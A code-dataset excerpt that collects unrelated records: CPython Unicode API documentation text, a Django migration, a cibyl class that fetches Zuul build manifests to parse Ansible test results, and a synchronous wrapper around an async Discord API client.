If byteorder is NULL, the codec starts in native order mode. Return NULL if an exception was raised by the codec. # final ? false for multiple passes? # errorhandler Compare two strings and return -1, 0, 1 for less than, equal, and greater than, respectively. Roughly equivalent to memcpy() only the base size is Py_UNICODE copies sizeof(Py_UNICODE) * length bytes from source to target Return a new string object from format and args; this is analogous to format % args. The args argument must be a tuple. Join a sequence of strings using the given separator and return the resulting Unicode string. Replace at most maxcount occurrences of substr in str with replstr and return the resulting Unicode object. maxcount == -1 means replace all occurrences. Return 1 if substr matches str[start:end] at the given tail end (direction == -1 means to do a prefix match, direction == 1 a suffix match), 0 otherwise. Return -1 if an error occurred. Return the number of non-overlapping occurrences of substr in str[start:end]. Return -1 if an error occurred. Return the first position of substr in str*[*start:end] using the given direction (direction == 1 means to do a forward search, direction == -1 a backward search). The return value is the index of the first match; a value of -1 indicates that no match was found, and -2 indicates that an error occurred and an exception has been set. Split a string giving a list of Unicode strings. If sep is NULL, splitting will be done at all whitespace substrings. Otherwise, splits occur at the given separator. At most maxsplit splits will be done. If negative, no limit is set. Separators are not included in the resulting list. Split a Unicode string at line breaks, returning a list of Unicode strings. CRLF is considered to be one line break. If keepend is 0, the Line break characters are not included in the resulting strings.
1.781231
2
weather/migrations/0003_auto_20190502_0425.py
JemisaR/Current-Weather
0
6627887
# Generated by Django 2.2.1 on 2019-05-02 01:25 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('weather', '0002_city_zip_code'), ] operations = [ migrations.AlterField( model_name='city', name='latitude', field=models.DecimalField(blank=True, decimal_places=4, max_digits=8), ), migrations.AlterUniqueTogether( name='city', unique_together={('name', 'country_code')}, ), ]
# Generated by Django 2.2.1 on 2019-05-02 01:25 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('weather', '0002_city_zip_code'), ] operations = [ migrations.AlterField( model_name='city', name='latitude', field=models.DecimalField(blank=True, decimal_places=4, max_digits=8), ), migrations.AlterUniqueTogether( name='city', unique_together={('name', 'country_code')}, ), ]
en
0.760129
# Generated by Django 2.2.1 on 2019-05-02 01:25
1.696507
2
cibyl/sources/zuul/apis/utils/tests/ansible/finder.py
rhos-infra/cibyl
3
6627888
""" # Copyright 2022 Red Hat # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ import json import logging from typing import Iterable from overrides import overrides from cibyl.sources.zuul.apis.utils.builds import ArtifactKind from cibyl.sources.zuul.apis.utils.tests.ansible.parser import \ AnsibleTestParser from cibyl.sources.zuul.apis.utils.tests.finder import TestFinder from cibyl.utils.json import Draft7ValidatorFactory, JSONValidatorFactory from cibyl.utils.net import download_into_memory LOG = logging.getLogger(__name__) class AnsibleTestFinder(TestFinder): class TestArgs: DEFAULT_FILES_OF_INTEREST = ['job-output.json'] parser: AnsibleTestParser = AnsibleTestParser() files_of_interest: Iterable[str] = DEFAULT_FILES_OF_INTEREST class ManifestArgs: DEFAULT_MANIFEST_SCHEMA = 'data/json/schemas/zuul/manifest.json' schema: str = DEFAULT_MANIFEST_SCHEMA validator_factory: JSONValidatorFactory = Draft7ValidatorFactory() def __init__(self, manifest_args=ManifestArgs(), test_args=TestArgs()): """ :param manifest_args: :type manifest_args: :class:`AnsibleTestFinder.ManifestArgs` :param test_args: :type test_args: :class:`AnsibleTestFinder.TestArgs` """ self._parser = test_args.parser self._files_of_interest = test_args.files_of_interest self._manifest_schema = manifest_args.schema self._manifest_validator_factory = manifest_args.validator_factory @staticmethod def _download_json(session, url): return json.loads(download_into_memory(url, session=session)) @staticmethod def 
_get_build_session(build): return build.session.session @staticmethod def _get_build_manifests(build): return [ artifact.url for artifact in build.artifacts if artifact.kind == ArtifactKind.ZUUL_MANIFEST ] @staticmethod def _get_log_file_url(build, file): return f"{build.log_url}{file}" @overrides def find(self, build): result = [] for manifest in self._get_build_manifests(build): result += self._parse_manifest(build, manifest) return result def _parse_manifest(self, build, manifest): result = [] session = self._get_build_session(build) validator = self._new_manifest_validator() contents = self._download_json(session, manifest) if not validator.is_valid(contents): msg = "Unknown format for manifest in: '%s'. Ignoring..." LOG.warning(msg, manifest) return result for file in contents['tree']: name = file['name'] if name in self._files_of_interest: LOG.info(f"Parsing tests from file: '{name}'...") result += self._parse_tests( build, self._get_log_file_url(build, name) ) return result def _new_manifest_validator(self): return self._manifest_validator_factory.from_file( self._manifest_schema ) def _parse_tests(self, build, test): result = [] try: result += self._parser.parse( self._download_json( self._get_build_session(build), test ) ) except ValueError as ex: LOG.warning( "Failed to fetch tests from: '%s'. Reason: '%s'.", test, str(ex) ) return result
""" # Copyright 2022 Red Hat # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ import json import logging from typing import Iterable from overrides import overrides from cibyl.sources.zuul.apis.utils.builds import ArtifactKind from cibyl.sources.zuul.apis.utils.tests.ansible.parser import \ AnsibleTestParser from cibyl.sources.zuul.apis.utils.tests.finder import TestFinder from cibyl.utils.json import Draft7ValidatorFactory, JSONValidatorFactory from cibyl.utils.net import download_into_memory LOG = logging.getLogger(__name__) class AnsibleTestFinder(TestFinder): class TestArgs: DEFAULT_FILES_OF_INTEREST = ['job-output.json'] parser: AnsibleTestParser = AnsibleTestParser() files_of_interest: Iterable[str] = DEFAULT_FILES_OF_INTEREST class ManifestArgs: DEFAULT_MANIFEST_SCHEMA = 'data/json/schemas/zuul/manifest.json' schema: str = DEFAULT_MANIFEST_SCHEMA validator_factory: JSONValidatorFactory = Draft7ValidatorFactory() def __init__(self, manifest_args=ManifestArgs(), test_args=TestArgs()): """ :param manifest_args: :type manifest_args: :class:`AnsibleTestFinder.ManifestArgs` :param test_args: :type test_args: :class:`AnsibleTestFinder.TestArgs` """ self._parser = test_args.parser self._files_of_interest = test_args.files_of_interest self._manifest_schema = manifest_args.schema self._manifest_validator_factory = manifest_args.validator_factory @staticmethod def _download_json(session, url): return json.loads(download_into_memory(url, session=session)) @staticmethod def 
_get_build_session(build): return build.session.session @staticmethod def _get_build_manifests(build): return [ artifact.url for artifact in build.artifacts if artifact.kind == ArtifactKind.ZUUL_MANIFEST ] @staticmethod def _get_log_file_url(build, file): return f"{build.log_url}{file}" @overrides def find(self, build): result = [] for manifest in self._get_build_manifests(build): result += self._parse_manifest(build, manifest) return result def _parse_manifest(self, build, manifest): result = [] session = self._get_build_session(build) validator = self._new_manifest_validator() contents = self._download_json(session, manifest) if not validator.is_valid(contents): msg = "Unknown format for manifest in: '%s'. Ignoring..." LOG.warning(msg, manifest) return result for file in contents['tree']: name = file['name'] if name in self._files_of_interest: LOG.info(f"Parsing tests from file: '{name}'...") result += self._parse_tests( build, self._get_log_file_url(build, name) ) return result def _new_manifest_validator(self): return self._manifest_validator_factory.from_file( self._manifest_schema ) def _parse_tests(self, build, test): result = [] try: result += self._parser.parse( self._download_json( self._get_build_session(build), test ) ) except ValueError as ex: LOG.warning( "Failed to fetch tests from: '%s'. Reason: '%s'.", test, str(ex) ) return result
en
0.721974
# Copyright 2022 Red Hat # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. :param manifest_args: :type manifest_args: :class:`AnsibleTestFinder.ManifestArgs` :param test_args: :type test_args: :class:`AnsibleTestFinder.TestArgs`
2.115412
2
discordobjects/client/client_sync.py
igo95862/DiscordBot_lib
0
6627889
import typing from .client_async import DiscordClientAsync import asyncio import threading class DiscordClientSync: def __init__(self, token: str, use_socket: bool = True, proxies: dict = None, default_timeout: int = 10): """ wrapper template return asyncio.run_coroutine_threadsafe( self.async_client. , self.client_event_loop ).result(timeout=self.timeout) :param token: :param use_socket: :param proxies: :param default_timeout: """ self.client_event_loop: asyncio.AbstractEventLoop = asyncio.new_event_loop() self.client_thread = threading.Thread(target=self.client_event_loop.run_forever) self.client_thread.start() self.async_client = DiscordClientAsync(token, use_socket, proxies, self.client_event_loop) self.local_event_loop = asyncio.get_event_loop() self.timeout = default_timeout def user_get(self, user_id: str) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.user_get(user_id), self.client_event_loop ).result(timeout=self.timeout) def me_get(self) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.me_get(), self.client_event_loop ).result(timeout=self.timeout) def me_modify(self, username: str) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.me_modify(username), self.client_event_loop ).result(timeout=self.timeout) def me_guild_list(self, before: str = None, after: str = None, limit: int = None) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.me_guild_list(before, after, limit), self.client_event_loop ).result(timeout=self.timeout) def me_guild_leave(self, guild_id: str) -> bool: return asyncio.run_coroutine_threadsafe( self.async_client.me_guild_leave(guild_id), self.client_event_loop ).result(timeout=self.timeout) def me_connections_get(self) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.me_connections_get(), self.client_event_loop ).result(timeout=self.timeout) def me_dm_list(self) -> dict: return asyncio.run_coroutine_threadsafe( self.async_client.me_dm_list(), 
self.client_event_loop ).result(timeout=self.timeout) ''' async def dm_create(self, recipient_id: str) -> dict: return await super().dm_create(recipient_id) async def dm_create_group(self, access_tokens: list, nicks: dict) -> dict: return await super().dm_create_group(access_tokens, nicks) async def dm_channel_user_add(self, channel_id: str, user_id: str, access_token: str, user_nick: str) -> dict: return await super().dm_channel_user_add(channel_id, user_id, access_token, user_nick) async def dm_channel_user_remove(self, channel_id: str, user_id: str) -> dict: return await super().dm_channel_user_remove(channel_id, user_id) async def guild_create(self, guild_name: str, region: str = None, icon: str = None, verification_level: int = None, default_message_notifications: int = None, roles=None, channels=None) -> dict: return await super().guild_create(guild_name, region, icon, verification_level, default_message_notifications, roles, channels) async def guild_get(self, guild_id: str) -> dict: return await super().guild_get(guild_id) async def guild_modify_name(self, guild_id: str, new_name: str) -> dict: return await super().guild_modify_name(guild_id, new_name) async def guild_modify_region(self, guild_id: str, new_region: str) -> dict: return await super().guild_modify_region(guild_id, new_region) async def guild_modify_verification_level(self, guild_id: str, new_level: int) -> dict: return await super().guild_modify_verification_level(guild_id, new_level) async def guild_modify_default_notification_level(self, guild_id: str, new_level: int) -> bool: return await super().guild_modify_default_notification_level(guild_id, new_level) async def guild_modify_afk_channel_id(self, guild_id: str, new_afk_channel_id: str) -> dict: return await super().guild_modify_afk_channel_id(guild_id, new_afk_channel_id) async def guild_modify_afk_timeout(self, guild_id: str, new_afk_timeout: int) -> dict: return await super().guild_modify_afk_timeout(guild_id, new_afk_timeout) async 
def guild_modify_icon(self, guild_id: str, new_icon: str) -> dict: return await super().guild_modify_icon(guild_id, new_icon) async def guild_modify_owner_id(self, guild_id: str, new_owner_id: str) -> dict: return await super().guild_modify_owner_id(guild_id, new_owner_id) async def guild_modify_splash(self, guild_id: str, new_splash: str) -> dict: return await super().guild_modify_splash(guild_id, new_splash) async def guild_modify_system_channel_id(self, guild_id: str, new_system_channel_id: str) -> dict: return await super().guild_modify_system_channel_id(guild_id, new_system_channel_id) async def guild_delete(self, guild_id: str) -> bool: return await super().guild_delete(guild_id) async def guild_channel_list(self, guild_id: str) -> dict: return await super().guild_channel_list(guild_id) async def guild_channel_create_text(self, guild_id: str, name: str, permission_overwrites: dict = None, parent_id: str = None, nsfw: bool = None) -> dict: return await super().guild_channel_create_text(guild_id, name, permission_overwrites, parent_id, nsfw) async def guild_channel_create_voice(self, guild_id: str, name: str, permission_overwrites: dict = None, parent_id: str = None, nsfw: bool = None, bitrate: int = None, user_limit: int = None) -> dict: return await super().guild_channel_create_voice(guild_id, name, permission_overwrites, parent_id, nsfw, bitrate, user_limit) async def guild_channel_create_category(self, guild_id: str, name: str, permission_overwrites: dict = None, nsfw: bool = None) -> dict: return await super().guild_channel_create_category(guild_id, name, permission_overwrites, nsfw) async def guild_channels_position_modify(self, guild_id: str, list_of_channels: list) -> bool: return await super().guild_channels_position_modify(guild_id, list_of_channels) async def guild_member_get(self, guild_id: str, user_id: str) -> dict: return await super().guild_member_get(guild_id, user_id) async def guild_members_list(self, guild_id: str, limit: int = None, after: 
str = None) -> typing.List[dict]: return await super().guild_members_list(guild_id, limit, after) async def guild_member_iter(self, guild_id: str, step_size: int = 1000) -> typing.Generator[dict, None, None]: return await super().guild_member_iter(guild_id, step_size) async def guild_member_add(self, guild_id: str, user_id: str, access_token: str, nick: str = None, roles: list = None, mute: bool = None, deaf: bool = None) -> dict: return await super().guild_member_add(guild_id, user_id, access_token, nick, roles, mute, deaf) async def guild_member_modify_nick(self, guild_id: str, user_id: str, nick_to_set: str) -> bool: return await super().guild_member_modify_nick(guild_id, user_id, nick_to_set) async def guild_member_modify_roles(self, guild_id: str, user_id: str, roles: list) -> bool: return await super().guild_member_modify_roles(guild_id, user_id, roles) async def guild_member_modify_mute(self, guild_id: str, user_id: str, mute_bool: bool) -> bool: return await super().guild_member_modify_mute(guild_id, user_id, mute_bool) async def guild_member_modify_deaf(self, guild_id: str, user_id: str, deaf_bool: bool) -> bool: return await super().guild_member_modify_deaf(guild_id, user_id, deaf_bool) async def guild_member_modify_move(self, guild_id: str, user_id: str, channel_move_to: int) -> bool: return await super().guild_member_modify_move(guild_id, user_id, channel_move_to) async def guild_member_me_nick_set(self, guild_id: str, nick_to_set: str) -> dict: return await super().guild_member_me_nick_set(guild_id, nick_to_set) async def guild_member_role_add(self, guild_id: str, user_id: str, role_id: str) -> bool: return await super().guild_member_role_add(guild_id, user_id, role_id) async def guild_member_role_remove(self, guild_id: str, user_id: str, role_id: str) -> bool: return await super().guild_member_role_remove(guild_id, user_id, role_id) async def guild_member_remove(self, guild_id: str, user_id: str) -> bool: return await 
super().guild_member_remove(guild_id, user_id) async def guild_ban_list(self, guild_id: str) -> dict: return await super().guild_ban_list(guild_id) async def guild_ban_create(self, guild_id: str, user_id: str, delete_messages_days=None) -> bool: return await super().guild_ban_create(guild_id, user_id, delete_messages_days) async def guild_ban_remove(self, guild_id: str, user_id: str) -> bool: return await super().guild_ban_remove(guild_id, user_id) async def guild_role_list(self, guild_id: str) -> dict: return await super().guild_role_list(guild_id) async def guild_role_create(self, guild_id: str, permissions: int = None, color: int = None, hoist: bool = None, mentionable: bool = None) -> dict: return await super().guild_role_create(guild_id, permissions, color, hoist, mentionable) async def guild_role_position_modify(self, guild_id: str, list_of_role_positions: list) -> dict: return await super().guild_role_position_modify(guild_id, list_of_role_positions) async def _guild_role_modify(self, guild_id: str, role_id: str, params: dict) -> dict: return await super()._guild_role_modify(guild_id, role_id, params) async def guild_role_modify_name(self, guild_id: str, role_id: str, name: str) -> dict: return await super().guild_role_modify_name(guild_id, role_id, name) async def guild_role_modify_permissions(self, guild_id: str, role_id: str, permissions: int) -> dict: return await super().guild_role_modify_permissions(guild_id, role_id, permissions) async def guild_role_modify_color(self, guild_id: str, role_id: str, color: int) -> dict: return await super().guild_role_modify_color(guild_id, role_id, color) async def guild_role_modify_hoist(self, guild_id: str, role_id: str, hoist: bool) -> dict: return await super().guild_role_modify_hoist(guild_id, role_id, hoist) async def guild_role_modify_mentionable(self, guild_id: str, role_id: str, mentionable: bool) -> dict: return await super().guild_role_modify_mentionable(guild_id, role_id, mentionable) async def 
guild_role_delete(self, guild_id: str, role_id: str) -> dict: return await super().guild_role_delete(guild_id, role_id) async def guild_prune_get_count(self, guild_id: str, days: int) -> dict: return await super().guild_prune_get_count(guild_id, days) async def guild_prune_begin(self, guild_id: str, days: int) -> dict: return await super().guild_prune_begin(guild_id, days) async def guild_voice_region_list(self, guild_id: str) -> dict: return await super().guild_voice_region_list(guild_id) async def guild_invite_list(self, guild_id: str) -> dict: return await super().guild_invite_list(guild_id) async def guild_integration_list(self, guild_id: str) -> dict: return await super().guild_integration_list(guild_id) async def guild_integration_create(self, guild_id: str, integration_type: str, integration_id: str) -> dict: return await super().guild_integration_create(guild_id, integration_type, integration_id) async def guild_integration_modify(self, guild_id: str, integration_id: str, expire_behavior: int, expire_grace_period: int, enable_emoticons: int) -> dict: return await super().guild_integration_modify(guild_id, integration_id, expire_behavior, expire_grace_period, enable_emoticons) async def guild_integration_delete(self, guild_id: str, integration_id: str) -> dict: return await super().guild_integration_delete(guild_id, integration_id) async def guild_integration_sync(self, guild_id: str, integration_id: str) -> dict: return await super().guild_integration_sync(guild_id, integration_id) async def guild_embed_get(self, guild_id: str) -> dict: return await super().guild_embed_get(guild_id) async def guild_embed_modify(self, guild_id: str, enabled: bool = None, channel_id: str = None) -> dict: return await super().guild_embed_modify(guild_id, enabled, channel_id) async def guild_emoji_list(self, guild_id: str) -> dict: return await super().guild_emoji_list(guild_id) async def guild_emoji_get(self, guild_id: str, emoji_id: str) -> dict: return await 
super().guild_emoji_get(guild_id, emoji_id) async def guild_emoji_create(self, guild_id: str, emoji_name: str, image: str, roles: tuple = ()) -> dict: return await super().guild_emoji_create(guild_id, emoji_name, image, roles) async def guild_emoji_modify(self, guild_id: str, emoji_id: str, emoji_name: str, roles: tuple = ()) -> dict: return await super().guild_emoji_modify(guild_id, emoji_id, emoji_name, roles) async def guild_emoji_delete(self, guild_id: str, emoji_id: str) -> dict: return await super().guild_emoji_delete(guild_id, emoji_id) async def channel_get(self, channel_id: str) -> dict: return await super().channel_get(channel_id) async def channel_modify_name(self, channel_id: str, name: str) -> dict: return await super().channel_modify_name(channel_id, name) async def channel_modify_position(self, channel_id: str, position: int) -> dict: return await super().channel_modify_position(channel_id, position) async def channel_modify_topic(self, channel_id: str, topic: str) -> dict: return await super().channel_modify_topic(channel_id, topic) async def channel_modify_bitrate(self, channel_id: str, bitrate: int) -> dict: return await super().channel_modify_bitrate(channel_id, bitrate) async def channel_modify_user_limit(self, channel_id: str, userlimit: int) -> dict: return await super().channel_modify_user_limit(channel_id, userlimit) async def channel_modify_permission_overwrites(self, channel_id: str, overwrite_array: list) -> dict: return await super().channel_modify_permission_overwrites(channel_id, overwrite_array) async def channel_modify_parent_id(self, channel_id: str, parent_id: str): return await super().channel_modify_parent_id(channel_id, parent_id) async def channel_delete(self, channel_id: str) -> dict: return await super().channel_delete(channel_id) async def channel_message_list(self, channel_id: str, limit: int = None, around: int = None, before: str = None, after: str = None) -> typing.List[dict]: return await 
super().channel_message_list(channel_id, limit, around, before, after) async def channel_message_iter(self, channel_id: str, step_size: int = 100) -> typing.AsyncGenerator[dict, None]: return await super().channel_message_iter(channel_id, step_size) async def channel_message_get(self, channel_id: str, message_id: str) -> dict: return await super().channel_message_get(channel_id, message_id) async def channel_message_create(self, channel_id: str, content: str, nonce: bool = None, tts: bool = None, embed: dict = None, files_tuples: typing.Tuple[str, bytes] = None) -> dict: return await super().channel_message_create(channel_id, content, nonce, tts, embed, files_tuples) async def channel_message_reaction_create(self, channel_id: str, message_id: str, emoji: str) -> bool: return await super().channel_message_reaction_create(channel_id, message_id, emoji) async def channel_message_reaction_my_delete(self, channel_id: str, message_id: str, emoji: int) -> bool: return await super().channel_message_reaction_my_delete(channel_id, message_id, emoji) async def channel_message_reaction_delete(self, channel_id: str, message_id: str, user_id: str, emoji: int) -> bool: return await super().channel_message_reaction_delete(channel_id, message_id, user_id, emoji) async def channel_message_reaction_list_users(self, channel_id: str, message_id: str, emoji: str, before: str = None, after: str = None, limit: int = None) -> \ typing.List[dict]: return await super().channel_message_reaction_list_users(channel_id, message_id, emoji, before, after, limit) async def channel_message_reaction_iter_users(self, channel_id: str, message_id: str, emoji: str, step_size: int = 100) -> typing.AsyncGenerator[dict, None]: return await super().channel_message_reaction_iter_users(channel_id, message_id, emoji, step_size) async def channel_message_reaction_delete_all(self, channel_id: str, message_id: str) -> bool: return await super().channel_message_reaction_delete_all(channel_id, message_id) async def 
channel_message_edit(self, channel_id: str, message_id: str, content: str = None, embed: dict = None) -> dict: return await super().channel_message_edit(channel_id, message_id, content, embed) async def channel_message_delete(self, channel_id: str, message_id: str) -> bool: return await super().channel_message_delete(channel_id, message_id) async def channel_message_bulk_delete(self, channel_id: str, messages_array: list) -> bool: return await super().channel_message_bulk_delete(channel_id, messages_array) async def channel_permissions_overwrite_edit(self, channel_id: str, overwrite_id: str, allow_permissions: int, deny_permissions: int, type_of_permissions: str) -> bool: return await super().channel_permissions_overwrite_edit(channel_id, overwrite_id, allow_permissions, deny_permissions, type_of_permissions) async def channel_permissions_overwrite_delete(self, channel_id: str, overwrite_id: str) -> bool: return await super().channel_permissions_overwrite_delete(channel_id, overwrite_id) async def channel_invite_list(self, channel_id: str) -> dict: return await super().channel_invite_list(channel_id) async def channel_invite_create(self, channel_id: str, max_age: int = None, max_uses: int = None, temporary_invite: bool = None, unique: bool = None) -> dict: return await super().channel_invite_create(channel_id, max_age, max_uses, temporary_invite, unique) async def channel_typing_start(self, channel_id: str) -> bool: return await super().channel_typing_start(channel_id) async def channel_pins_get(self, channel_id: str) -> dict: return await super().channel_pins_get(channel_id) async def channel_pins_add(self, channel_id: str, message_id: str) -> dict: return await super().channel_pins_add(channel_id, message_id) async def channel_pins_delete(self, channel_id: str, message_id: str) -> bool: return await super().channel_pins_delete(channel_id, message_id) async def invite_get(self, invite_code: str) -> dict: return await super().invite_get(invite_code) async def 
invite_delete(self, invite_code: str) -> dict: return await super().invite_delete(invite_code) async def invite_accept(self, invite_code: str) -> dict: return await super().invite_accept(invite_code) async def webhook_create(self, channel_id: str, name: str, avatar: bytes = None) -> dict: return await super().webhook_create(channel_id, name, avatar) async def webhook_get_channel(self, channel_id: str) -> dict: return await super().webhook_get_channel(channel_id) async def webhook_guild_get(self, guild_id: str) -> dict: return await super().webhook_guild_get(guild_id) async def webhook_get(self, webhook_id: str) -> dict: return await super().webhook_get(webhook_id) async def webhook_token_get(self, webhook_id: str, webhook_token: int) -> dict: return await super().webhook_token_get(webhook_id, webhook_token) async def webhook_modify(self, webhook_id: str, name: str = None, avatar: bytes = None, channel_id: str = None) -> dict: return await super().webhook_modify(webhook_id, name, avatar, channel_id) async def webhook_token_modify(self, webhook_id: str, webhook_token: int, name: str = None, avatar: bytes = None, channel_id: str = None) -> dict: return await super().webhook_token_modify(webhook_id, webhook_token, name, avatar, channel_id) async def webhook_delete(self, webhook_id: str) -> dict: return await super().webhook_delete(webhook_id) async def webhook_token_delete(self, webhook_id: str, webhook_token: int) -> dict: return await super().webhook_token_delete(webhook_id, webhook_token) async def webhook_execute(self, webhook_id: str, webhook_token: int, content: str, username: str = None, avatar_url: str = None, tts: bool = None, wait_response: bool = None) -> dict: return await super().webhook_execute(webhook_id, webhook_token, content, username, avatar_url, tts, wait_response) async def voice_region_list(self) -> dict: return await super().voice_region_list() async def audit_log_get(self, guild_id: str, filter_user_id: str = None, filter_action_type: int = 
None, before: str = None, limit: int = None) -> typing.Tuple[dict, dict, dict]: return await super().audit_log_get(guild_id, filter_user_id, filter_action_type, before, limit) async def audit_log_iter(self, guild_id: str, filter_user_id: str = None, filter_action_type: int = None, step_size: int = 100) -> typing.AsyncGenerator[typing.Tuple[dict, dict, dict], None]: return await super().audit_log_iter(guild_id, filter_user_id, filter_action_type, step_size) async def gateway_bot_get(self) -> dict: return await super().gateway_bot_get() '''
import typing
from .client_async import DiscordClientAsync
import asyncio
import threading


class DiscordClientSync:
    """Blocking (synchronous) facade over :class:`DiscordClientAsync`.

    A private asyncio event loop is started on a background thread; every
    public method submits the corresponding coroutine to that loop with
    :func:`asyncio.run_coroutine_threadsafe` and blocks the calling thread
    until the result arrives or ``default_timeout`` seconds elapse
    (raising :class:`concurrent.futures.TimeoutError` on expiry).
    """

    def __init__(self, token: str, use_socket: bool = True, proxies: dict = None,
                 default_timeout: int = 10):
        """
        :param token: Discord API token, forwarded to DiscordClientAsync.
        :param use_socket: forwarded to DiscordClientAsync.
        :param proxies: forwarded to DiscordClientAsync.
        :param default_timeout: seconds each blocking call waits for its result.
        """
        self.client_event_loop: asyncio.AbstractEventLoop = asyncio.new_event_loop()
        # daemon=True so an un-closed client cannot keep the process alive
        # (the loop runs forever until close() stops it).
        self.client_thread = threading.Thread(
            target=self.client_event_loop.run_forever, daemon=True)
        self.client_thread.start()
        self.async_client = DiscordClientAsync(token, use_socket, proxies,
                                               self.client_event_loop)
        # Kept for backward compatibility with callers that read this
        # attribute; it is not used internally.
        self.local_event_loop = asyncio.get_event_loop()
        self.timeout = default_timeout

    def _call(self, coro) -> typing.Any:
        """Submit *coro* to the client loop and block for its result.

        Shared implementation for every public wrapper method below.
        """
        return asyncio.run_coroutine_threadsafe(
            coro, self.client_event_loop
        ).result(timeout=self.timeout)

    def close(self) -> None:
        """Stop the background event loop and join its thread.

        After this call no further API methods may be used.
        """
        self.client_event_loop.call_soon_threadsafe(self.client_event_loop.stop)
        self.client_thread.join()

    def user_get(self, user_id: str) -> dict:
        """Fetch a user object by its id."""
        return self._call(self.async_client.user_get(user_id))

    def me_get(self) -> dict:
        """Fetch the user object of the authenticated account."""
        return self._call(self.async_client.me_get())

    def me_modify(self, username: str) -> dict:
        """Change the authenticated account's username."""
        return self._call(self.async_client.me_modify(username))

    def me_guild_list(self, before: str = None, after: str = None, limit: int = None) -> dict:
        """List guilds the authenticated account is a member of."""
        return self._call(self.async_client.me_guild_list(before, after, limit))

    def me_guild_leave(self, guild_id: str) -> bool:
        """Leave the given guild; returns True on success."""
        return self._call(self.async_client.me_guild_leave(guild_id))

    def me_connections_get(self) -> dict:
        """Fetch the authenticated account's connections."""
        return self._call(self.async_client.me_connections_get())

    def me_dm_list(self) -> dict:
        """List the authenticated account's DM channels."""
        return self._call(self.async_client.me_dm_list())
en
0.387857
wrapper template return asyncio.run_coroutine_threadsafe( self.async_client. , self.client_event_loop ).result(timeout=self.timeout) :param token: :param use_socket: :param proxies: :param default_timeout: async def dm_create(self, recipient_id: str) -> dict: return await super().dm_create(recipient_id) async def dm_create_group(self, access_tokens: list, nicks: dict) -> dict: return await super().dm_create_group(access_tokens, nicks) async def dm_channel_user_add(self, channel_id: str, user_id: str, access_token: str, user_nick: str) -> dict: return await super().dm_channel_user_add(channel_id, user_id, access_token, user_nick) async def dm_channel_user_remove(self, channel_id: str, user_id: str) -> dict: return await super().dm_channel_user_remove(channel_id, user_id) async def guild_create(self, guild_name: str, region: str = None, icon: str = None, verification_level: int = None, default_message_notifications: int = None, roles=None, channels=None) -> dict: return await super().guild_create(guild_name, region, icon, verification_level, default_message_notifications, roles, channels) async def guild_get(self, guild_id: str) -> dict: return await super().guild_get(guild_id) async def guild_modify_name(self, guild_id: str, new_name: str) -> dict: return await super().guild_modify_name(guild_id, new_name) async def guild_modify_region(self, guild_id: str, new_region: str) -> dict: return await super().guild_modify_region(guild_id, new_region) async def guild_modify_verification_level(self, guild_id: str, new_level: int) -> dict: return await super().guild_modify_verification_level(guild_id, new_level) async def guild_modify_default_notification_level(self, guild_id: str, new_level: int) -> bool: return await super().guild_modify_default_notification_level(guild_id, new_level) async def guild_modify_afk_channel_id(self, guild_id: str, new_afk_channel_id: str) -> dict: return await super().guild_modify_afk_channel_id(guild_id, new_afk_channel_id) async def 
guild_modify_afk_timeout(self, guild_id: str, new_afk_timeout: int) -> dict: return await super().guild_modify_afk_timeout(guild_id, new_afk_timeout) async def guild_modify_icon(self, guild_id: str, new_icon: str) -> dict: return await super().guild_modify_icon(guild_id, new_icon) async def guild_modify_owner_id(self, guild_id: str, new_owner_id: str) -> dict: return await super().guild_modify_owner_id(guild_id, new_owner_id) async def guild_modify_splash(self, guild_id: str, new_splash: str) -> dict: return await super().guild_modify_splash(guild_id, new_splash) async def guild_modify_system_channel_id(self, guild_id: str, new_system_channel_id: str) -> dict: return await super().guild_modify_system_channel_id(guild_id, new_system_channel_id) async def guild_delete(self, guild_id: str) -> bool: return await super().guild_delete(guild_id) async def guild_channel_list(self, guild_id: str) -> dict: return await super().guild_channel_list(guild_id) async def guild_channel_create_text(self, guild_id: str, name: str, permission_overwrites: dict = None, parent_id: str = None, nsfw: bool = None) -> dict: return await super().guild_channel_create_text(guild_id, name, permission_overwrites, parent_id, nsfw) async def guild_channel_create_voice(self, guild_id: str, name: str, permission_overwrites: dict = None, parent_id: str = None, nsfw: bool = None, bitrate: int = None, user_limit: int = None) -> dict: return await super().guild_channel_create_voice(guild_id, name, permission_overwrites, parent_id, nsfw, bitrate, user_limit) async def guild_channel_create_category(self, guild_id: str, name: str, permission_overwrites: dict = None, nsfw: bool = None) -> dict: return await super().guild_channel_create_category(guild_id, name, permission_overwrites, nsfw) async def guild_channels_position_modify(self, guild_id: str, list_of_channels: list) -> bool: return await super().guild_channels_position_modify(guild_id, list_of_channels) async def guild_member_get(self, guild_id: str, 
